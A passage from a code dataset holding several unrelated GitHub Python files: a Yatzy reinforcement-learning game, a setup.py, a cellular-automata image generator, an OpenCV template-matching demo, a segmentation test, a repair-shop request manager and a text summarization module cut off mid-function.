buzzard.utils.journal\nfrom buzzard.core.optimizer import runOptimization\nfrom buzzard.utils.journal import printHeader\nfrom buzzard.utils.reader import readConfig, readConfigFromJson\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(\n prog=\"buzzard\",\n description=\"A tool for optimizing (material) parameters for finite element simulations\",\n )\n\n parser.add_argument(\n \"file\",\n type=str,\n nargs=1,\n )\n parser.add_argument(\"--parallel\", action=\"store_true\", default=False)\n parser.add_argument(\"--createPlots\", action=\"store_true\", default=False)\n parser.add_argument(\"--quiet\", action=\"store_true\", default=False)\n\n args = parser.parse_args()\n\n buzzard.core.optimizer.executeSimulationsInParallel = args.parallel\n buzzard.core.optimizer.createPlots = args.createPlots\n buzzard.utils.journal.quiet = args.quiet\n\n printHeader()\n\n configFile = args.file[0]\n root, ext = os.path.splitext(configFile)\n if ext == \".py\":\n config = readConfig(configFile)\n elif ext == \".json\":\n config = readConfigFromJson(configFile)\n else:\n raise Exception(\"File type of config file must be .py or .json\")\n\n result = runOptimization(config)\n","repo_name":"EdelweissFE/Buzzard","sub_path":"buzzard.py","file_name":"buzzard.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"23721332100","text":"import datetime\nimport random\nimport time\nfrom numpy import average\n\n\nfrom game_ai import AIGame, AITest\nfrom hand import YatzyHand\nfrom leaderboard import Leaderboard\nfrom ai_gen_7 import AIGenSevenPointOne, AIGenSevenPointTwo, AIGenSevenPointTwoPointOne, AIGenSevenPointZero\n\n\n\nPLAYER = AIGenSevenPointTwoPointOne('karen')\n\n\nclass RLGame2(AIGame):\n def __init__(self, gen):\n super().__init__(gen=gen)\n\n\n def play(self, num):\n input('Welcome to Yatzy! Are you ready? ')\n start = datetime.datetime.now()\n\n self.make_name_lists()\n\n player = PLAYER \n player.read_q()\n\n for i in range(num):\n\n player.clear_scoresheet()\n first_name = random.choice(self.first_names)\n last_name = random.choice(self.last_names)\n name = first_name + ' ' + last_name\n player.name = name\n\n turns = 0\n while turns < 15:\n self.ai_turn(player)\n turns += 1\n \n new_player = player.copy()\n self.players.append(new_player)\n if i % 1000 == 0:\n print('Game {} complete'.format(i))\n \n\n final_scores = self.calculate_final_scores()\n end = datetime.datetime.now()\n print('Time elapsed: {}'.format(end - start))\n print(\"Game over! Now for the leaderboard...\")\n\n leaderboard = Leaderboard(self.gen)\n leaderboard.run(final_scores)\n print('')\n print('')\n\n\n def ai_turn(self, player):\n hand = YatzyHand()\n\n rerolls = 0\n while rerolls < 2:\n reroll = player.choose_action(hand, epsilon=False, q_table='reroll')\n\n if reroll == 'True':\n indices = player.choose_action(hand, epsilon=False, q_table='indices')\n hand = hand.reroll(indices)\n rerolls += 1\n \n else:\n break\n\n action = player.choose_action(hand, epsilon=False, q_table='moves')\n\n score = getattr(hand, action)()\n\n player.update_scoresheet(action, score)\n\n\n def print_final_scores(self, final_scores):\n \n final = sorted(final_scores, key= lambda x:x['score'])\n \n for i, item in enumerate(final):\n if i == len(final) - 1:\n print('And the winner is... ')\n print('')\n print('{} with {} points! Congrats!'.format(item['name'], item['score']))\n print('')\n\n else:\n print('{}: {} points'.format(item['name'], item['score']))\n print('')\n\nclass RLTrainer2(AIGame):\n \n def train(self, num):\n player = PLAYER\n self.players.append(player)\n player.read_q()\n player.load_new_hands()\n\n input(\"Ok {}! Let's begin! \".format(player.name))\n\n start = time.perf_counter()\n\n for i in range(num):\n player.clear_scoresheet()\n \n while None in player.scoresheet.values():\n self.ai_train_turn(player)\n \n if i % 1000 == 0:\n print('Finished game {}'.format(i))\n player.write_q()\n \n\n player.write_q()\n end = time.perf_counter()\n print('took {} seconds for {} runs'.format(end - start, num))\n \n\n def ai_train_turn(self, player):\n rerolls = 0\n\n hand = YatzyHand()\n old_hand = hand.copy()\n new_hand = []\n\n\n \n while rerolls < 2:\n action = player.choose_action(hand, epsilon=True, q_table='reroll')\n if action == 'True':\n player.update_reroll(hand, action)\n\n indices = player.choose_action(hand, epsilon=True, q_table='indices')\n hand = hand.reroll(indices)\n new_hand = hand.copy()\n rerolls += 1\n \n player.update_indices(old_hand, indices, new_hand)\n\n else:\n player.update_reroll(hand, action)\n break\n\n \n\n action = player.choose_action(hand, epsilon=True, q_table='moves')\n score = getattr(hand, action)()\n\n player.update_moves(hand, action, score)\n player.update_scoresheet(action, score)\n\n\nclass RLTest2(AITest):\n\n def play(self):\n player = PLAYER\n self.players.append(player)\n player.read_q()\n\n input(\"Ok {}! Let's begin! \".format(player.name))\n\n turns = 0\n while turns < 15:\n self.ai_turn(player)\n turns += 1\n\n\n final_scores = self.calculate_final_scores()\n print(\"Game over! Now for the score...\")\n print('')\n self.print_final_scores(final_scores)\n print('')\n\n print(\"{}'s Scoresheet:\".format(player.name))\n player.print_scoresheet()\n\n\n print('')\n\n print('Thanks for playing!')\n print('')\n\n\n def ai_turn(self, player):\n hand = YatzyHand()\n action = None\n\n rerolls = 0\n while rerolls < 2:\n reroll = player.choose_action(hand, epsilon=False, q_table='reroll')\n\n if reroll == 'True':\n print('')\n input('Hand: {}'.format(hand))\n print('')\n\n \n indices = player.choose_action(hand, epsilon=False, q_table='indices')\n print('Rerolling {}...'.format(indices))\n hand = hand.reroll(indices)\n rerolls += 1\n \n else:\n break\n\n action = player.choose_action(hand, epsilon=False, q_table='moves')\n\n print('')\n print('Hand: {}'.format(hand))\n input('Action decided: {}'.format(action))\n print('')\n\n score = getattr(hand, action)()\n\n player.update_scoresheet(action, score)\n player.print_scoresheet()\n\n\nclass RLGameData(RLGame2):\n def __init__(self, gen=None):\n super().__init__(gen=gen)\n self.yatzy_hands = 0\n self.total_rerolls = 0\n\n\n def play(self, num):\n input('Welcome to Yatzy! Are you ready? ')\n start = datetime.datetime.now()\n\n self.make_name_lists()\n\n player = PLAYER \n player.read_q()\n\n for i in range(num):\n\n player.clear_scoresheet()\n first_name = random.choice(self.first_names)\n last_name = random.choice(self.last_names)\n name = first_name + ' ' + last_name\n player.name = name\n\n turns = 0\n while turns < 15:\n self.ai_turn(player)\n turns += 1\n \n new_player = player.copy()\n self.players.append(new_player)\n if i % 1000 == 0:\n print('Game {} complete'.format(i))\n \n\n end = datetime.datetime.now()\n print('Time elapsed: {}'.format(end - start))\n print(\"Game over! Now for the leaderboard...\")\n\n\n data = [\n {'ones': 0, 'total': 0},\n {'twos': 0, 'total': 0},\n {'threes': 0, 'total': 0},\n {'fours': 0, 'total': 0},\n {'fives': 0, 'total': 0},\n {'sixes': 0, 'total': 0},\n {'one_pair': 0, 'total': 0},\n {'two_pair': 0, 'total': 0},\n {'three_kind': 0, 'total': 0},\n {'four_kind': 0, 'total': 0},\n {'small_straight': 0, 'total': 0},\n {'large_straight': 0, 'total': 0},\n {'full_house': 0, 'total': 0},\n {'chance': 0, 'total': 0},\n {'yatzy': 0, 'total': 0}\n ]\n top_sheet_bonuses = [0, 0]\n\n \n for player in self.players:\n sum = player.scoresheet['ones'] + player.scoresheet['twos'] + player.scoresheet['threes'] + player.scoresheet['fours'] + player.scoresheet['fives'] + player.scoresheet['sixes']\n for i, item in enumerate(player.scoresheet.items()):\n if item[1] != 0:\n data[i][item[0]] += 1\n data[i]['total'] += item[1]\n if sum >= 63:\n top_sheet_bonuses[0] += 1\n top_sheet_bonuses[1] += sum\n \n print('')\n print('')\n print('Gen {}'.format(self.gen))\n print('')\n '''\n for item in data:\n play = list(item.keys())[0]\n print(f\"Total {play}: {item[play]} out of {num} ---- Average: {item['total'] / item[play]}\")\n '''\n \n\n print('')\n print('Total rerolls: {}'.format(self.total_rerolls))\n #print('Total yatzy hands: {}'.format(self.yatzy_hands))\n\n print('')\n '''\n print('Total top-sheet bonuses: {} out of {}'.format(top_sheet_bonuses[0], num))\n print('Average top-sheet score: {}'.format(average(top_sheet_bonuses[1] / num)))\n '''\n print('')\n print('')\n\n\n def ai_turn(self, player):\n hand = YatzyHand()\n if hand.yatzy() == 50:\n self.yatzy_hands += 1 \n\n rerolls = 0\n while rerolls < 2:\n reroll = player.choose_action(hand, epsilon=False, q_table='reroll')\n\n\n if reroll == 'True':\n indices = player.choose_action(hand, epsilon=False, q_table='indices')\n hand = hand.reroll(indices)\n if hand.yatzy() == 50:\n self.yatzy_hands += 1 \n rerolls += 1\n self.total_rerolls += 1\n \n else:\n break\n\n action = player.choose_action(hand, epsilon=False, q_table='moves')\n\n score = getattr(hand, action)()\n\n player.update_scoresheet(action, score)\n\nif __name__ == \"__main__\":\n\n game = RLGameData(gen='7.2.1')\n game.play(1000)\n\n","repo_name":"jimmybanta/yatzy","sub_path":"rlgame2.py","file_name":"rlgame2.py","file_ext":"py","file_size_in_byte":9757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"15785291412","text":"# -*- coding: utf-8 -*-\nfrom setuptools import find_packages, setup\n\nclassifiers = [\n \"Development Status :: 5 - Production/Stable\",\n \"Intended Audience :: Education\",\n \"Operating System :: Microsoft :: Windows :: Windows 10\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python ::3\"\n]\n\nsetup(\n name=\"stoneforge\",\n version=\"0.1.4\",\n author=\"GIECAR - UFF\",\n url=\"https://github.com/giecaruff/stoneforge\",\n description=\"Geophysics equations, algorithms and methods\",\n long_description=open(\"README.md\").read() + \"\\n\\n\" + open(\"CHANGELOG.txt\").read(),\n license=\"MIT\",\n packages=find_packages(),\n include_package_data=True,\n python_requires=\">=3.8.8\",\n install_requires=[\n \"numpy>=1.21, <1.22.1\",\n \"pytest>=6.2.2, <6.2.5\",\n \"scipy>=1.4.1, <1.8.1\",\n \"scikit-learn>=0.22.1, <0.24.2\",\n #\"xgboost==1.4.0\",\n \"matplotlib>=3.5.0, <3.5.3\",\n \"pandas==1.5.2\",\n \"catboost==1.0.6\",\n \"lightgbm==3.3.2\",\n #\"catboost==0.26.1\"\n #\"auto-sklearn==0.12.5\"\n \n #\"matplotlib\", ### TO REMOVE BEFORE MERGE!!\n #\"pandas\", ### TO REMOVE BEFORE MERGE!!\n #\"jupyter\", ### TO REMOVE BEFORE MERGE!!\n #\"seaborn\" ### # TO REMOVE BEFORE MERGE!!\n ],\n)","repo_name":"giecaruff/stoneforge","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"33164875598","text":"# coding: utf-8\nfrom Bio import SeqIO\nimport cv2\nimport os\nimport scipy.misc\nimport numpy as np\nfrom PIL import Image\n\ndef seq2bin(seq_str):\n dict = {'P': '00001',\n 'Q': '00100',\n 'R': '00110',\n 'Y': '01100',\n 'W': '01110',\n 'T': '10000',\n 'M': '10011',\n 'N': '10101',\n 'V': '11010',\n 'E': '11101',\n 'L': '00011',\n 'H': '00101',\n 'S': '01001',\n 'F': '01011',\n 'C': '01111',\n 'I': '10010',\n 'K': '10100',\n 'A': '11001',\n 'D': '11100',\n 'G': '11110',\n 'end': '11111'}\n seq =list(seq_str)\n bin_=''\n for j in range(len(seq)):\n stra=str(dict[seq[j]])\n bin_ = bin_ + stra\n bin_info = bin_\n return bin_info\n\ndef Cellular_Automata(str_bit,Rule_number):\n rule_nb = ['111','110','101','100','011','010','001','000']\n rule_number = Rule_number \n rule_number_bit = str('{:08b}'.format(rule_number))\n rule_cond =list(rule_number_bit)\n xs=str_bit\n ab=xs[len(xs)-1]+xs+xs[0]\n new_ab=''\n for k in range(len(ab)-2):\n nb = ab[k:k+3]\n index_= rule_nb.index(nb)\n rule_bit = rule_cond[index_]\n new_ab = new_ab + rule_bit\n return new_ab\n\ndef Bin2Cellauto(Bin_info,Epochs,Rule_number):\n rule_number = Rule_number\n bin_info = Bin_info\n epoch=Epochs\n t = 0\n XS=np.zeros(shape=(epoch+1,len(bin_info)), dtype=np.int16)\n cellauto_bin=bin_info\n XS[0]=list(bin_info)\n kkk = 0\n for j in range(epoch):\n cellauto_bin = Cellular_Automata(cellauto_bin,rule_number)\n result = list(cellauto_bin) \n results = np.array(result, dtype=np.int16)\n XS[j+1]=results\n if j%1000 == 0:\n kkk += 1\n print(kkk)\n return XS\n\ndef CA_Img(seq_file,rule_numbers,epoch):\n for seq_record in SeqIO.parse(\"./data/\"+str(seq_file)+\".fasta\", \"fasta\"):\n seq_id = (str(seq_record.id))\n description = seq_record.description\n a = description.split(\"|\")\n seq = str(seq_record.seq)\n print(len(seq))\n bin_info = seq2bin(seq)\n print(len(bin_info))\n CA = Bin2Cellauto(bin_info,epoch,rule_numbers)\n print('yes!')\n BBB = CA*255\n img_dir = './data/'+str(seq_file)+'/'\n img_dir_Exists = os.path.exists(img_dir)\n if not img_dir_Exists:\n os.makedirs(img_dir)\n img_name = str(seq_file) +'_'+ str(seq_id)+'_rule'+str(rule_numbers)+'_'+str(epoch)\n scipy.misc.toimage(BBB).save(str(img_dir)+str(img_name)+'.jpeg')\nrule_numbers =184\nepochs = [25]\nfile_list = ['Wuhan']\n\nfor epoch in epochs:\n for i in file_list:\n print(i)\n CA_Img(i,rule_numbers,epoch)\n\n","repo_name":"liujin66/iAMP-CA2L","sub_path":"iAMP-CA2L/cellular automata pictures.py","file_name":"cellular automata pictures.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"} +{"seq_id":"26372351126","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n\"\"\"\n1. 模板匹配介绍:模板匹配是一种最原始、最基本的模式识别方法,研究某一特定目标的图像位于图像的什么地方,进而对图像进行定位。\n在待检测图像上,从左到右,从上向下计算模板图像与重叠子图像的匹配度,匹配程度越大,两者相同的可能性越大。\n2. 模板匹配函数:\nresult = cv2.matchTemplate(image, templ, method)\n - image参数表示待搜索图像\n - templ参数表示模板图像,必须不大于源图像并具有相同的数据类型\n - method参数表示计算匹配程度的方法\n - TM_SQDIFF_NORMED是标准平方差匹配,通过计算两图之间平方差来进行匹配,最好匹配为0,匹配越差,匹配值越大\n - TM_CCORR_NORMED是标准相关性匹配,采用模板和图像间的乘法操作,数越大表示匹配程度较高,0表示最坏的匹配效果,\n 这种方法排除了亮度线性变化对相似度计算的影响。\n - TM_CCOEFF_NORMED是标准相关性系数匹配,两图减去了各自的平均值之外,还要各自除以各自的方差。\n 将模板对其均值的相对值与图像对其均值的相关值进行匹配,1表示完美匹配,-1表示糟糕的匹配,0表示没有任何相关性(随机序列)。\nminVal, maxVal, minLoc, maxLoc = cv2.minMaxLoc()\n - minVal参数表示返回的最小值\n - maxVal参数表示返回的最大值\n - minLoc参数表示返回的最小位置\n - maxLoc参数表示返回的最大位置\n\"\"\"\n\ndef template_demo(tpl, target):\n \"\"\"\n 模板匹配\n :param tpl: 模板\n :param target: 源图像\n :return:\n \"\"\"\n # 定义匹配的方法,三种模板匹配的方法\n methods = [cv2.TM_SQDIFF_NORMED, cv2.TM_CCORR_NORMED, cv2.TM_CCOEFF_NORMED]\n # 获取模板维度信息\n th, tw = tpl.shape[:2]\n # 遍历三种模板匹配的方法\n for md in methods:\n # 模板匹配,获得所有子图像的相似度系数\n result = cv2.matchTemplate(target, tpl, md)\n print(result)\n # 获取相似度系数最大值和最小值,以及相应子图像的位置\n min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(result)\n print(min_val, max_val, min_loc, max_loc)\n if md == cv2.TM_SQDIFF_NORMED:\n t1 = min_loc\n else:\n t1 = max_loc\n # 计算得到矩形右下角的坐标\n br = (t1[0] + tw, t1[1] + th)\n # 画出目标框\n cv2.rectangle(target, t1, br, (0, 0, 255), 2)\n cv2.namedWindow(\"match-\" + str(md), cv2.WINDOW_NORMAL)\n cv2.imshow(\"match-\" + str(md), target)\n\n\n\ndef main():\n # 加载模板图像\n tpl = cv2.imread(r\"./images/sample2.jpg\")\n # 加载源图像\n target = cv2.imread(r\"./images/target1.jpg\")\n # 显示模板图和源图像\n cv2.namedWindow(\"template image\", cv2.WINDOW_NORMAL)\n cv2.imshow(\"template image\", tpl)\n cv2.namedWindow(\"target image\", cv2.WINDOW_NORMAL)\n cv2.imshow(\"target image\", target)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n template_demo(tpl, target)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n\n\nif __name__ == '__main__':\n main()\n\n\n\n","repo_name":"yykzjh/opencv_practice","sub_path":"第4课 图像特征与目标检测(形状特征(Harris特征、HOG特征、SIFT特征)、LBP纹理特征、模板匹配、人脸检测、行人检测)/模板匹配.py","file_name":"模板匹配.py","file_ext":"py","file_size_in_byte":3272,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22865225968","text":"import unittest\n\nimport cv2\nimport PIL\n\nfrom modelscope.outputs import OutputKeys\nfrom modelscope.pipelines import pipeline\nfrom modelscope.utils.constant import Tasks\nfrom modelscope.utils.cv.image_utils import panoptic_seg_masks_to_image\nfrom modelscope.utils.test_utils import test_level\n\n\nclass ImagePanopticSegmentationTest(unittest.TestCase):\n\n def setUp(self) -> None:\n self.task = Tasks.image_segmentation\n self.model_id = 'damo/cv_swinL_panoptic-segmentation_cocopan'\n\n @unittest.skipUnless(test_level() >= 0, 'skip test in current test level')\n def test_image_panoptic_segmentation(self):\n input_location = 'data/test/images/image_panoptic_segmentation.jpg'\n pan_segmentor = pipeline(Tasks.image_segmentation, model=self.model_id)\n result = pan_segmentor(input_location)\n\n draw_img = panoptic_seg_masks_to_image(result[OutputKeys.MASKS])\n cv2.imwrite('result.jpg', draw_img)\n print('print test_image_panoptic_segmentation return success')\n\n @unittest.skipUnless(test_level() >= 0, 'skip test in current test level')\n def test_image_panoptic_segmentation_from_PIL(self):\n input_location = 'data/test/images/image_panoptic_segmentation.jpg'\n pan_segmentor = pipeline(Tasks.image_segmentation, model=self.model_id)\n PIL_array = PIL.Image.open(input_location)\n result = pan_segmentor(PIL_array)\n\n draw_img = panoptic_seg_masks_to_image(result[OutputKeys.MASKS])\n cv2.imwrite('result.jpg', draw_img)\n print('print test_image_panoptic_segmentation from PIL return success')\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"modelscope/modelscope","sub_path":"tests/pipelines/test_image_panoptic_segmentation.py","file_name":"test_image_panoptic_segmentation.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":4825,"dataset":"github-code","pt":"16"} +{"seq_id":"25419163167","text":"from datetime import *\n\nfrom tools import *\n\n\ndef search_u(text):\n p = People()\n f = open('SEARCH_U.txt', 'w')\n for person in p.people:\n if text in person.NAME or text in person.PHONE:\n f.write(person.__str__() + '\\n')\n\n\ndef search_e(text):\n e = Equip()\n f = open('SEARCH_E.txt', 'w')\n for gadget in e.gadgets:\n if text in gadget.MODEL:\n f.write(gadget.__str__() + '\\n')\n\n\ndef search_w(text):\n w = Works()\n f = open('SEARCH_W.txt', 'w')\n for work in w.works:\n if text in work.WORK and not work.WORK.isdigit() or text in str(work.PRICE):\n f.write(work.__str__() + '\\n')\n\n\ndef new_card(db, line, edit=False):\n if db == 'USER':\n p = People()\n new_person = Person(*line.split(', '))\n if (new_person.PHONE in p.get_phones() or new_person.ID in p.get_ids()) and not edit:\n raise CardInBaseException('user.txt')\n p.add_person(line)\n p.make_file()\n elif db == 'EQUIP':\n e = Equip()\n new_gadget = Gadget(*line.split(', '))\n if new_gadget.BRAND in e.get_brands() and new_gadget.MODEL == \\\n e.get_models()[\n e.get_brands().index(new_gadget.BRAND)] or new_gadget.ID in e.get_ids():\n raise CardInBaseException('equip.txt')\n e.add_equip(line)\n e.make_file()\n elif db == 'WORK':\n w = Works()\n new_work = Work(*line.split(', '))\n if new_work.WORK in w.get_works() or new_work.ID in w.get_ids():\n raise CardInBaseException('user.txt')\n w.add_work(line)\n w.make_file()\n\n\ndef edit_card(db, ID, line):\n if db == 'USER':\n f = open('people.txt')\n data = f.readlines()\n data.pop(People().get_ids().index(ID))\n f.close()\n f = open('people.txt', 'w')\n f.writelines(data)\n f.close()\n elif db == 'EQUIP':\n Equip().gadgets.pop(Equip().get_ids().index(ID))\n f = open('equip.txt')\n data = f.readlines()\n data.pop(Equip().get_ids().index(ID))\n f.close()\n f = open('equip.txt', 'w')\n f.writelines(data)\n f.close()\n elif db == 'WORK':\n Works().works.pop(Works().get_ids().index(ID))\n f = open('works.txt')\n data = f.readlines()\n data.pop(Works().get_ids().index(ID))\n f.close()\n f = open('works.txt', 'w')\n f.writelines(data)\n f.close()\n new_card(db, line, True)\n\n\ndef print_card(db, ID):\n if db == 'USER':\n print(People().people[People().get_ids().index(ID)])\n elif db == 'EQUIP':\n print(Equip().gadgets[Equip().get_ids().index(ID)])\n elif db == 'WORK':\n print(Works().works[Works().get_ids().index(ID)])\n\n\ndef list_db(db):\n if db == 'USER':\n print(People())\n elif db == 'EQUIP':\n print(Equip())\n elif db == 'WORK':\n print(Works())\n\n\ndef create_report():\n f = open('reports.txt', 'w')\n lines = []\n now = datetime.now()\n for request in Requests().requests:\n if datetime(*list(map(int, request.COMPLETE_DATE.split('-')))) <= now < datetime(\n *list(map(int, request.DELIVERY_DATE.split('-')))):\n email = People().get_emails()[People().get_ids().index(request.CLIENT_ID)]\n brand = Equip().get_brands()[Equip().get_ids().index(request.EQUIP_ID)]\n model = Equip().get_models()[Equip().get_ids().index(request.EQUIP_ID)]\n lines.append(f'{email}, {brand}, {model}, {request.COMPLETE_DATE};\\n')\n f.write('\\n'.join([line for line in lines]))\n f.close()\n\n\ndef create_inwork(master_name):\n f = open('inwork.txt', 'w')\n now = datetime.now()\n for request in Requests().requests:\n if People().get_names()[People().get_ids().index(request.MASTER_ID)] == master_name and \\\n datetime(*list(map(int, request.COMPLETE_DATE.split('-')))) < now:\n brand = Equip().get_brands()[Equip().get_ids().index(request.EQUIP_ID)]\n model = Equip().get_models()[Equip().get_ids().index(request.EQUIP_ID)]\n f.write(f'{request.DATE}, {request.ID}, {brand}, {model}, {request.REASON};\\n')\n f.close()\n\n\ndef print_help(command=''):\n f = open('help.txt', encoding='utf-8')\n data = f.readlines()\n if not command:\n for line in data:\n print(line.strip('\\n'))\n elif command.startswith('HELP'):\n print(''.join(data[:2]))\n elif command.startswith('NEW'):\n print(data[2])\n print(''.join(data[9:12]))\n else:\n for line in data:\n if line.startswith(command):\n print(line.split('\\n'))\n break\n\n\ndef del_request(ID):\n i = Requests().get_ids().index(ID)\n f = open('requests.txt')\n data = f.readlines()\n f.close()\n data = data[:i] + data[i+1:]\n f = open('requests.txt', 'w')\n f.writelines(data)\n f.close()\n\n\ndef request_in_requests(ID):\n for line in open('requests.txt').readlines():\n if line.split()[1] == str(ID):\n return True\n return False\n\n\ndef new_request():\n args = {\n 'ID': '',\n 'DATE': '',\n 'CLIENT_ID': '',\n 'EQUIP_ID': '',\n 'REASON': '',\n 'MASTER_ID': '',\n 'WORK_IDS': '',\n 'COMPLETE_DATE': '',\n 'DELIVERY_DATE': '',\n 'COST': ''\n }\n print('Выбирайте поля командой PUSH и вводите значения')\n print('+------------+')\n print('|Начало формы|')\n print('+------------+')\n for key, value in args.items():\n print(f'{key}: {str(value)}')\n print('+-----------+')\n print('|Конец формы|')\n print('+-----------+')\n while not all_filled(args):\n c = input()\n command = c.split()\n if len(command) == 2 and command[0] == 'PUSH' and command[1] in args.keys():\n value = input()\n if command[1] == 'ID':\n if value.isdigit() and int(value) not in Requests().get_ids():\n args['ID'] = int(value)\n else:\n raise BadValueException(value)\n elif command[1] in ['DATE', 'COMPLETE_DATE', 'DELIVERY_DATE']:\n x = value.split('-')\n if len(x) == 3 and (x[0] + x[1] + x[2]).isdigit() and len(x[0]) == 4 and \\\n len(x[1]) == 2 and len(x[2]) == 2 and 1 <= int(x[1]) <= 12 and 1 <= \\\n int(x[2]) <= 31:\n args[command[1]] = value\n elif command[1] == 'CLIENT_ID':\n if value.isdigit() and int(value) in People().get_ids():\n args['CLIENT_ID'] = int(value)\n else:\n raise BadValueException(value)\n elif command[1] == 'EQUIP_ID':\n if value.isdigit() and int(value) in Equip().get_ids():\n args['EQUIP_ID'] = int(value)\n else:\n raise BadValueException(value)\n elif command[1] == 'REASON':\n args['REASON'] = value\n elif command[1] == 'MASTER_ID':\n if value.isdigit() and int(value) in \\\n People().get_ids() and 1 <= int(value) <= 20:\n args['MASTER_ID'] = int(value)\n else:\n raise BadValueException(value)\n elif command[1] == 'WORK_IDS':\n value = value.split()\n check = True\n for v in value:\n if not v.isdigit() and int(v) in Works().get_ids():\n check = False\n if check:\n args['WORK_IDS'] = value\n else:\n raise BadValueException(' '.join(value))\n else:\n raise UnknownFieldNameException(command[1])\n if args['WORK_IDS']:\n s = 0\n for work_id in args['WORK_IDS']:\n s += Works().get_prices()[Works().get_ids().index(int(work_id))]\n args['COST'] = s\n print('+------------+')\n print('|Начало формы|')\n print('+------------+')\n for key, value in args.items():\n print(f'{key}: {str(value)}')\n print('+-----------+')\n print('|Конец формы|')\n print('+-----------+')\n if all_filled(args):\n Requests().add_request(f\"{', '.join([value for value in args.values()])};\")\n break\n else:\n raise UnknownCommandException(c)\n\n\ndef all_filled(args):\n check = True\n for value in args.values():\n if value == '':\n check = False\n return check\n\n\ndef main():\n command = input().split()\n if command[0] == 'HELP':\n if len(command) == 1:\n print_help()\n elif len(command) == 2:\n print_help(command[1])\n elif command[0] == 'NEW':\n if command[1] == 'REQUEST':\n new_request()\n else:\n new_card(command[1], ' '.join(command[2:]))\n\n elif command[0] == 'LIST' and len(command) == 2:\n list_db(command[1])\n elif command[0] == 'EDIT':\n edit_card(command[2], int(command[1]), command[1] + ', ' + ' '.join(command[3:]))\n elif command[0] == 'PRINT' and len(command) == 3:\n print_card(command[2], int(command[1]))\n elif command[0] == 'FIND_U' and len(command) == 2:\n search_u(command[1])\n elif command[0] == 'FIND_E' and len(command) == 2:\n search_u(command[1])\n elif command[0] == 'FIND_W' and len(command) == 2:\n search_u(command[1])\n elif command[0] == 'DEL' and len(command) == 2:\n del_request(int(command[1]))\n Requests().make_file()\n elif command[0] == 'EXIT' and len(command) == 1:\n raise ExitException\n else:\n raise UnknownCommandException(f\"'{' '.join(command)}'\")\n\n\nif __name__ == '__main__':\n while True:\n # noinspection PyBroadException\n try:\n main()\n except CardInBaseException as file_name:\n print(f'Карточка уже есть в {file_name}')\n except UnknownCommandException as command_line:\n print(f\"Неизвестная команда {command_line}\")\n except ExitException:\n print('Выход...')\n break\n except UnknownFieldNameException as field_name:\n print(f'Неизвестное поле {field_name}')\n except BadValueException as bad_value:\n print(f'Неверное значение {bad_value}')\n except TypeError as e:\n print(e)\n print('Неизвестная команда')\n except Exception:\n print(Exception.__class__.__name__)\n finally:\n print('----------------------------------------------\\n')\nnew_request()\n","repo_name":"vasil1y-777/Control-project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10885,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"9769878255","text":"import torch\nfrom transformers import BartTokenizer, BartForConditionalGeneration\nfrom fairseq.models.bart import BARTModel\n\ntorch_device = 'cuda' if torch.cuda.is_available() else 'cpu'\n\nBART_ARGS = {\n \"num_beams\": 4,\n \"length_penalty\": 2,\n \"max_length\": 142,\n \"min_length\": 56,\n \"no_repeat_ngram_size\": 3\n}\n\nSCITLDR_ARGS = {\n \"num_beams\": 2,\n \"length_penalty\": 0.4,\n \"max_length\": 30,\n \"min_length\": 5,\n \"no_repeat_ngram_size\": 3\n}\n\ndef summarize(paper_id, papers, model = \"BART\", content = \"content\"):\n \"\"\"\n Summarizes a single paper specified by its hash\n\n Params: \n paper_hash: hash to identify the paper\n papers: dict of papers containing the paper\n model: language model used (options: BART, SciTLDR)\n content: key specifying the field of the paper dict to be used (e.g. abstract, content...)\n \n Returns: \n summary string\n \"\"\"\n\n text = papers[paper_id][content]\n text = text.replace('\\n','')\n\n return summarize_batch([text], model)\n\ndef summarize_batch(texts, model = \"BART\"):\n \"\"\"\n Summarizes a provided batch of texts\n\n Params: \n texts: list containing texts to be summarized\n model: language model used (options: BART, SciTLDR)\n \n Returns: \n summarization as string\n \"\"\"\n\n if model == \"BART\":\n return bart_summarize(texts, **BART_ARGS)\n\n if model == \"SciTLDR\":\n return sciTLDR_summarize(texts, **SCITLDR_ARGS)\n\ndef bart_summarize(texts, num_beams, length_penalty, max_length, min_length, no_repeat_ngram_size):\n \"\"\"\n Summarizes a provied batch of texts using the BART model: \n https://arxiv.org/abs/1910.13461\n\n Params: \n texts: list containing texts to be summarized\n num_beams:\n length_penalty:\n max_length:\n min_length:\n no_repeat_ngram_size: \n \n Returns: \n list containing summary strings\n \"\"\"\n\n tokenizer = BartTokenizer.from_pretrained('facebook/bart-large-cnn')\n model = BartForConditionalGeneration.from_pretrained('facebook/bart-large-cnn')\n\n text_input_ids = tokenizer.batch_encode_plus(texts, return_tensors='pt', max_length=1024, truncation=True, padding=True)['input_ids'].to(torch_device)\n summary_ids = model.generate(text_input_ids, num_beams=num_beams, length_penalty=length_penalty, max_length=max_length, min_length=min_length, no_repeat_ngram_size=no_repeat_ngram_size) \n summary_txt = tokenizer.batch_decode(summary_ids, skip_special_tokens=True)\n return summary_txt\n\ndef sciTLDR_summarize(texts, num_beams, length_penalty, max_length, min_length, no_repeat_ngram_size):\n \"\"\"\n Summarizes a provied batch of texts using the SciTLDR model:\n https://arxiv.org/abs/2004.15011\n\n Params: \n texts: list containing texts to be summarized\n num_beams:\n length_penalty:\n max_length:\n min_length:\n no_repeat_ngram_size: \n \n Returns: \n list containing summary strings\n \"\"\"\n\n 